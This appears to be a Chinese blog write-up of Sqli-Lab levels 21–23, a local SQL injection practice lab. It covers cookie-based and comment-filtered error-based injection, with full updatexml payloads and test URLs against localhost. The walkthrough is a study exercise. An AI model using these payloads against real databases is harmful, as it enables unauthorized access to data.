Sqli-Lab | Less 21-23

本文介绍了在Sqli-Lab靶场中Less-21到Less-23的Cookie注入问题,通过错误注入的方式进行攻击。在Less-21中,发现Cookie值经过Base64加密,利用Burp Suite抓包并解密。Less-22涉及到双引号闭合的payload,而Less-23则遇到过滤注释符的情况,通过调整payload绕过过滤。
摘要由CSDN通过智能技术生成

sqli靶场一直没来得及做,趁寒假把它做了,同时巩固下SQL注入

Less-21

Less-21 Cookie Injection- Error Based- complex - string

cookie注入-基于错误-复杂-字符串

测试

登录进去
]
uname的值被加密,以=结尾,首先想到base64

不出意外是base64加密
burp抓包,然后改cookie中的uname再加密就可以
payload

admin') and updatexml(1,concat(0x7e,(select user()),0x7e),1#

源码

设置cookie并使用base64加密

调用cookie中的unamebase64加密,sql语句直接进行查询并返回错误和结果

Less-22

Less-22 Cookie Injection- Error Based- Double Quotes - string

cookie注入-基于错误-双引号-字符串
payload

admin" and updatexml(1,concat(0x7e,(select user()),0x7e),1#

Less-23

Error Based- strip comments

基于错误-有过滤

测试

http://127.0.0.1/sqli/Less-23/?id=1'

http://127.0.0.1/sqli/Less-23/?id=1'#
http://127.0.0.1/sqli/Less-23/?id=1'%23
http://127.0.0.1/sqli/Less-23/?id=1'--+


都多了个',应该是过滤掉了注释符,那直接用引号来闭合

http://127.0.0.1/sqli/Less-23/?id=1' or 1='1


payload:

1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) or 1='1

源码

对注释符进行了替换

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值